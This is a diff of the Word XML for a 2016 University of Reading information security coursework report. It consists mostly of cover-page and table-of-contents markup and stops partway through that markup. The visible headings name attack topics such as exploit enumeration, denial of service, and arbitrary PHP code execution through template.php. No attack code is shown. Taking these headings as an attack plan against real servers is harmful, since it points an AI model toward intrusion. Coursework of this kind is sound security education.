+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -2,34 +2,178 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:body>
-    <w:sdt>
-      <w:sdtPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
           <w:caps/>
           <w:color w:val="5B9BD5" w:themeColor="accent1"/>
           <w:sz w:val="72"/>
           <w:szCs w:val="72"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:id w:val="1127046344"/>
-        <w:docPartObj>
-          <w:docPartGallery w:val="Cover Pages"/>
-          <w:docPartUnique/>
-        </w:docPartObj>
-      </w:sdtPr>
-      <w:sdtEndPr/>
-      <w:sdtContent>
-        <w:p>
-          <w:pPr>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-              <w:caps/>
-              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-              <w:sz w:val="72"/>
-              <w:szCs w:val="72"/>
-              <w:lang w:val="en-US"/>
-            </w:rPr>
-          </w:pPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:caps/>
+          <w:noProof/>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+          <w:sz w:val="72"/>
+          <w:szCs w:val="72"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1678599</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>5655035</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2360930" cy="1404620"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="20955"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="217" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2360930" cy="1404620"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="28"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="28"/>
+                              </w:rPr>
+                              <w:t>University of Reading</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="28"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="28"/>
+                              </w:rPr>
+                              <w:t>2016</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>40000</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>20000</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:132.15pt;margin-top:445.3pt;width:185.9pt;height:110.6pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-width-percent:400;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:400;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox style="mso-fit-shape-to-text:t">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="28"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="28"/>
+                        </w:rPr>
+                        <w:t>University of Reading</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="28"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="28"/>
+                        </w:rPr>
+                        <w:t>2016</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:caps/>
+            <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            <w:sz w:val="72"/>
+            <w:szCs w:val="72"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:id w:val="1127046344"/>
+          <w:docPartObj>
+            <w:docPartGallery w:val="Cover Pages"/>
+            <w:docPartUnique/>
+          </w:docPartObj>
+        </w:sdtPr>
+        <w:sdtContent>
           <w:r>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
@@ -140,7 +284,6 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
-                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -160,16 +303,7 @@
                                               <w:sz w:val="72"/>
                                               <w:szCs w:val="72"/>
                                             </w:rPr>
-                                            <w:t>Information S</w:t>
-                                          </w:r>
-                                          <w:r>
-                                            <w:rPr>
-                                              <w:caps/>
-                                              <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
-                                              <w:sz w:val="72"/>
-                                              <w:szCs w:val="72"/>
-                                            </w:rPr>
-                                            <w:t>ecurity</w:t>
+                                            <w:t>Information Security</w:t>
                                           </w:r>
                                         </w:p>
                                       </w:sdtContent>
@@ -187,7 +321,6 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
-                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -242,7 +375,6 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                         <w:text/>
                                       </w:sdtPr>
-                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -287,7 +419,6 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
-                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -337,7 +468,6 @@
                                           <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns1:category[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                           <w:text/>
                                         </w:sdtPr>
-                                        <w:sdtEndPr/>
                                         <w:sdtContent>
                                           <w:r>
                                             <w:rPr>
@@ -374,11 +504,7 @@
               </mc:Choice>
               <mc:Fallback>
                 <w:pict>
-                  <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                    <v:stroke joinstyle="miter"/>
-                    <v:path gradientshapeok="t" o:connecttype="rect"/>
-                  </v:shapetype>
-                  <v:shape id="Text Box 138" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:17.25pt;margin-top:95.25pt;width:534pt;height:506.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:middle" o:gfxdata="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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
+                  <v:shape id="Text Box 138" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.25pt;margin-top:95.25pt;width:534pt;height:506.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:middle" o:gfxdata="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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                     <v:textbox inset="0,0,0,0">
                       <w:txbxContent>
                         <w:tbl>
@@ -428,7 +554,6 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
-                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -448,16 +573,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>Information S</w:t>
-                                    </w:r>
-                                    <w:r>
-                                      <w:rPr>
-                                        <w:caps/>
-                                        <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
-                                        <w:sz w:val="72"/>
-                                        <w:szCs w:val="72"/>
-                                      </w:rPr>
-                                      <w:t>ecurity</w:t>
+                                      <w:t>Information Security</w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -475,7 +591,6 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
-                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -530,7 +645,6 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                   <w:text/>
                                 </w:sdtPr>
-                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -575,7 +689,6 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
-                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -625,7 +738,6 @@
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns1:category[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                     <w:text/>
                                   </w:sdtPr>
-                                  <w:sdtEndPr/>
                                   <w:sdtContent>
                                     <w:r>
                                       <w:rPr>
@@ -658,9 +770,9 @@
             </w:rPr>
             <w:br w:type="page"/>
           </w:r>
-        </w:p>
-      </w:sdtContent>
-    </w:sdt>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -729,7 +841,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc446495758" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693170" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -756,7 +868,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495758 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693170 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -799,13 +911,13 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495759" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693171" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Method</w:t>
+              <w:t>Method/Foot-Printing</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -826,7 +938,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495759 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693171 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -869,14 +981,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495760" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693172" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Foot-Printing</w:t>
+              <w:t>Entry points</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -897,7 +1009,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495760 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693172 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -917,7 +1029,187 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693173" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Apache Server</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693173 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693174" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>PHP Functionality</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693174 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -940,14 +1232,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495761" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693175" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Entry points</w:t>
+              <w:t>Enumerating Exploits</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -968,7 +1260,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495761 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693175 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -988,7 +1280,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1007,10 +1299,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495762" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693176" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1022,7 +1316,9 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1033,7 +1329,7 @@
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Apache Server</w:t>
+              <w:t>DOS (Denial of service attack)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1054,7 +1350,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495762 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693176 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1074,7 +1370,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1093,10 +1389,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495763" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693177" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1108,7 +1406,9 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1119,7 +1419,7 @@
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>PHP Functionality</w:t>
+              <w:t>PHP code execution using profile signature</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1140,7 +1440,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495763 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693177 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1160,7 +1460,187 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693178" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Execution of Arbitrary PHP code by modifying template.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693178 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
